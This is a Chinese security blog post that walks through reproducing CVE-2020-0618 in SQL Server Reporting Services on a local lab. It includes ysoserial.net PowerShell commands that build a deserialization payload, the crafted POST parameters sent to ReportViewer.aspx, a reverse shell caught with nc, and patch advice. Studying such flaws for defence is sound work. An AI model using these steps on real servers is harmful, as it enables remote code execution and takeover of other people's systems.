(CVE-2020-0618)SQL Server 遠程代碼執行復現

2020-09-03 東塔安全學院

0x00簡介

2月12日,微軟發布安全更新披露了Microsoft SQL Server Reporting Services 遠程代碼執行漏洞(CVE-2020-0618)。SQL Server 是Microsoft 開發的一個關係資料庫管理系統(RDBMS),是現在世界上廣泛使用的資料庫之一。


點擊此處添加圖片說明文字


0x01漏洞簡介

獲得低權限的攻擊者向受影響版本的SQL Server的Reporting Services實例發送精心構造的請求,可利用此漏洞在報表伺服器服務帳戶的上下文中執行任意代碼。

0x02影響版本

SQL Server 2012 for 32-bit Systems Service Pack 4 (QFE)

SQL Server 2012 for x64-based Systems Service Pack 4 (QFE)

SQL Server 2014 Service Pack 3 for 32-bit Systems (CU)

SQL Server 2014 Service Pack 3 for 32-bit Systems (GDR)

SQL Server 2014 Service Pack 3 for x64-based Systems (CU)

SQL Server 2014 Service Pack 3 for x64-based Systems (GDR)

SQL Server 2016 for x64-based Systems Service Pack 1

SQL Server 2016 for x64-based Systems Service Pack 2 (CU)

SQL Server 2016 for x64-based Systems Service Pack 2 (GDR)


0x03環境搭建

1. 下載安裝windows server2016標準版standard


點擊此處添加圖片說明文字


下載地址:

ed2k://|file|cn_windows_server_2016_x64_dvd_9718765.iso|6176450560|CF1B73D220F1160DE850D9E1979DBD50|/ //使用迅雷打開


2. 下載安裝Sql Server 2016資料庫

選擇全新安裝sqlserver

點擊此處添加圖片說明文字


一直下一步到功能選擇勾上"資料庫引擎服務"和"Reporting Services"服務。


點擊此處添加圖片說明文字


在」資料庫引擎配置」選擇混合模式創建帳號 帳號:sa 密碼:123456便於後面連接報表伺服器。


點擊此處添加圖片說明文字

點擊此處添加圖片說明文字


訪問 http://localhost/ReportS,創建分頁報表,提示需要安裝報表伺服器。


點擊此處添加圖片說明文字


下載報表生成器,安裝好報表伺服器後,新建一個報表


點擊此處添加圖片說明文字


點擊此處添加圖片說明文字


點擊此處添加圖片說明文字


此時就用到了我們前面設置的帳號密碼 sa/123456

點擊此處添加圖片說明文字

點擊此處添加圖片說明文字


然後把左側欄位拉到右測即可

點擊此處添加圖片說明文字

到了這裡報表就創建好了

點擊此處添加圖片說明文字

保存一下,然後點擊運行

點擊此處添加圖片說明文字

點擊此處添加圖片說明文字


在瀏覽器訪問漏洞路徑:

http://localhost/ReportServer/Pages/ReportViewer.aspx

點擊此處添加圖片說明文字


0x04漏洞復現

1. 下載POC編譯工具

下載地址:https://github.com/incredibleindishell/ysoserial.net-complied

2.使用powershell打開ysoserial.exe工具生成有效負載,執行完最後一步的時候payload已經存在於剪切板。

1. $command = &39;

2. $bytes = [System.Text.Encoding]::Unicode.GetBytes($command)

3. $encodedCommand = [Convert]::ToBase64String($bytes)

4. .\ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "powershell.exe -encodedCommand $encodedCommand" -o base64 | clip

點擊此處添加圖片說明文字

3.下載Postman-win64-7.22.1:https://www.postman.com/

安裝並啟動postman,發送方式POST,地址http://localhost/ReportServer/pages/ReportViewer.aspx

Body中填入鍵值對

NavigationCorrector$PageState= NeedsCorrection

NavigationCorrector$ViewState=payload(payload生成方式上面講到)

__VIEWSTATE=

如下圖

點擊此處添加圖片說明文字

Authorization中TYPE選擇NTLM,用戶名密碼出填入本機用戶的用戶名和密碼,如下圖

點擊此處添加圖片說明文字

注意此處如果不配置Authorization,發送後會返回401 unauthorized

配置完成後,點擊發送,返回結果如下圖

點擊此處添加圖片說明文字

回到nc查看已經成功收到反連shell,如下圖

點擊此處添加圖片說明文字

我們在執行幾個命令

點擊此處添加圖片說明文字

0x05修複方式

目前微軟官方已針對受支持的版本發布了修復該漏洞的安全補丁,請受影響的用戶儘快安裝補丁進行防護。

臨時修複方案

將Reporting Services監聽ip改為本地。暫時禁用外部連接,保證此服務安全。

點擊此處添加圖片說明文字


相關焦點

  • Windows遠程桌面服務漏洞(CVE-2019-0708)復現測試
    1漏洞概述2019年5月14日,微軟發布了針對遠程桌面服務的關鍵遠程執行代碼漏洞CVE-2019-0708的補丁,該漏洞影響某些舊版本的Windows。攻擊者一旦成功觸發該漏洞,便可以在目標系統上執行任意代碼,該漏洞的觸發無需任何用戶交互操作。這就意味著,存在漏洞的計算機只要聯網,無需任何操作,就可能遭遇黑客遠程攻擊,運行惡意代碼。
  • 微軟Exchange伺服器遠程代碼執行漏洞復現分析[CVE-2020-0688]
    高質量的安全文章,安全offer面試經驗分享盡在 # 掌控安全EDU #漏洞簡介在本周二的最新補丁程序中,微軟公司發布了重要級補丁程序,以解決中的遠程執行代碼錯誤藉助YSoSerial.net,攻擊者可以以system權限在Exchange伺服器的控制面板上執行任意.NET代碼。要利用此漏洞,我們需要從經過身份驗證的會話中收集ViewStateUserKey和的__VIEWSTATEGENERATOR的值。該ViewStateUserKey可從ASP.NET會話的_SessionID cookie的隱藏欄位中輕易獲得。
  • HVV 2020 | Microsoft Exchange Server遠程代碼執行漏洞
    2、漏洞描述由於對cmdlet參數的驗證不正確,攻擊者可能會通過向受影響的 Exchange 伺服器發送包含特殊 cmdlet 參數的郵件來觸發此漏洞,成功利用此漏洞的攻擊者能夠在受影響的系統上以 system 權限執行任意代碼
  • SMB遠程代碼執行漏洞(CVE-2020-0796)分析
    2020年3月10日,微軟發布安全公告,其中包括一個Windows SMBv3 遠程代碼執行漏洞(CVE-2020-0796)。遠程未經身份驗證的攻擊者可利用該漏洞在應用程式中執行任意代碼。2020年6月2日,國外安全研究員公開了CVE-2020-0796(別名:SMBGhost)漏洞的RCE代碼,攻擊者可能基於此POC構造導致蠕蟲式傳播的武器化工具,無需用戶交互即可控制目標系統,此前已公開的PoC是可導致受影響的系統藍屏。
  • CVE-2020-16898 Windows tcp/ip遠程代碼執行漏洞復現
    No.2 漏洞分析2.1 漏洞背景2020年10月14日,某監測發現 Microsoft 發布了 TCP/IP遠程代碼執行漏洞的風險通告,該漏洞是由於Windows TCP/IP堆棧在處理IMCPv6 Router Advertisement(路由通告)數據包時存在漏洞,遠程攻擊者通過構造特製的
  • Metasploit漏洞掃描與復現
    漏洞掃描過程2.漏洞分析過程3.漏洞復現過程一、環境準備好,首先我們得準備好環境當前我們在虛擬機中開啟了kali,和kali的靶機kali攻擊主機192.168.179.130漏洞靶機192.168.179.131二、漏掃掃描好都準備好了,根據日常滲透經驗,首先我們使用
  • Windows SMBv3 remote Exploit (cve-2020-0796)漏洞成功復現
    今天上午發了個視頻,cve-2020-0796的漏洞復現。。本地可以提權,很可惜的是遠程是藍屏。今天下午測試了一下遠程的exp,也成功執行了。我用的exp是https://github.com/chompie1337/SMBGhost_RCE_PoC。測試環境是我下載了一個win10的1909版的虛擬機鏡像。由於頭條裡不讓放迅雷之類的連結,所以大家自行搜索吧。
  • tomcat CVE-2020-1938漏洞復現
    文件包含漏洞之——tomcat CVE-2020-1938漏洞復現2月20日,國家信息安全漏洞共享平臺(CNVD)發布了Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938),這個漏洞是由於Tomcat AJP協議存再缺陷而導致,而攻擊者利用該漏洞通過構造特定參數,讀取伺服器webapp下的任意文件,若目標伺服器存在文件上傳功能,攻擊者可以進一步實現遠程代碼執行。
  • 永恆之黑:CVE-2020-0796漏洞復現
    漏洞介紹3月12日,微軟披露了一個最新的SMBv3(3.1.1)遠程代碼執行漏洞(CVE-2020-0796),俗稱「永恆之黑」。本漏洞源於SMBv3沒有正確處理壓縮的數據包,在解壓數據包的時候使用客戶端傳過來的長度進行解壓時,並沒有檢查長度是否合法,最終導致整數溢出。
  • CVE-2020-14882&14883weblogic未授權命令執行漏洞復現
    其中組合利用 CVE-2020-14882/CVE-2020-14883 可使未經授權的攻擊者繞過 WebLogic 後臺登錄等限制,最終遠程執行代碼接管 WebLogic 伺服器,利用難度極低,風險極大。此處漏洞均存在於 WebLogic 的控制臺中。該組件為 WebLogic 全版本自帶組件,並且該漏洞通過 HTTP 協議進行利用。
  • SQL SERVER 2014如何跟蹤程序執行哪些SQL語句
    SQL SERVER 2014如何跟蹤程序執行哪些SQL語句?SQL SERVER 2014自帶有SQL SERVER Profiler工具(tools>sql server profiler,如圖1),我們利用這個工具就可以達到我們想要的效果:
  • MyBatis遠程代碼執行漏洞CVE-2020-26945
    MyBatis避免了幾乎所有的JDBC代碼和手動設置參數以及獲取結果集。映射成資料庫中的記錄漏洞危害2020年10月6日,MyBatis官方發布了MyBatis 3.5.6版本,修復了一個遠程代碼執行漏洞,該漏洞編號為CVE-2020-26945。
  • Apache SkyWalking SQL注入漏洞復現分析 (CVE-2020-9483)
    近日,百度雲安全團隊監測到國內某廠商發布了Apache SkyWalking SQL注入漏洞的風險通告,漏洞編號為CVE-2020-9483。當SkyWalking使用H2、MySQL或者TiDB作為存儲方案時,攻擊者可通過默認未授權的GraphQL接口構造惡意請求,從而獲取敏感數據。
  • 中間件"SQL重複執行"
    他們的代碼邏輯是這樣: int count = updateSql(sql1); ... // 偽代碼 int count = updateSql(&34;100&34;200&34;更新失敗&34;1&34;2&34;1&34;2&34;1&34;2") and status = 1;於是筆者細細讀了這部分的代碼
  • SMB遠程代碼執行漏洞CVE-2020-0796安全通告
    【漏洞名稱】SMB遠程代碼執行漏洞(CVE-2020-0796),有安全研究者取名「SMBGhost」。SMB 3.1.1協議中處理壓縮消息時,對其中數據沒有經過安全檢查,直接使用會引發內存破壞漏洞,可能被攻擊者利用遠程執行任意代碼。攻擊者利用該漏洞無須權限即可實現遠程代碼執行,受黑客攻擊的目標系統只需開機在線即可能被入侵。
  • 首發|CertiK:深度解析F5 BIG-IP遠程代碼執行漏洞
    前言今日一早,推特以及各大技術論壇上炸開了鍋,安全圈子的人都在討論F5設備裡遠程代碼執行的漏洞。很多討論的內容,大部分是在分享如何尋找目標,利用漏洞,並沒有關於對漏洞成因的分析。CertiK的安全研究員下載了存在漏洞的程序,搭建環境復現漏洞後,對漏洞的起因進行了分析,並在下文分享給大家。
  • 【權威發布】關於Oracle WebLogic Server未授權遠程代碼執行高危漏洞的預警通報
    近日,我中心技術支持單位奇安信CERT監測到Oracle WebLogic Server 遠程代碼執行漏洞POC被公開。利用該漏洞,遠程攻擊者可在 WebLogic Server Console 執行任意代碼。漏洞編號:CVE-2020-14882,安全級別為「高危」。
  • 「漏洞預警」Apache Solr Velocity模板遠程代碼執行復現
    該漏洞可以攻擊最新版本的Solr,目前該漏洞利用詳情已經廣泛流傳於Github以及各大安全群,且公開的EXP可以執行任意命令並自帶回顯,官方暫未發布補丁。漏洞編號暫無影響版本7.0.1 / 7.1.0 / 7.5.0 / 7.7.1 / 7.7.2 / 8.1.0 / 8.1.1 / 8.2.0,漏洞環境靶機:192.168.50.122 (centos7)攻擊機:192.168.50.217 (mac)漏洞復現搭建靶場環境 Apache_Solr
  • 蘋果watchOS 7.1以下發現任意代碼執行漏洞 需要儘快升級
    以下是漏洞的詳細信息:資料來源:https://Support.apple.com/zh-cn/HT2119281.cve-2020-27910,cve 2020-27916,cve 2020-10017,cve 2020-27909(官方尚未說明嚴重程度,如下所示)處理惡意製作的音頻文件可能導致任意代碼執行2.2020年-10003
  • 「最新漏洞簡訊」Windows域名系統伺服器漏洞(CVE-2020-1350)
    情報編號:H1020200715漏洞概述CVE-2020-1350是Windows DNS伺服器中的嚴重遠程執行代碼(RCE)漏洞,官方分類為「可蠕蟲級」高危漏洞,CVSS基本得分為 10.0。此問題是由Microsoft的DNS伺服器角色實現中的缺陷引起的,並影響所有Windows Server版本。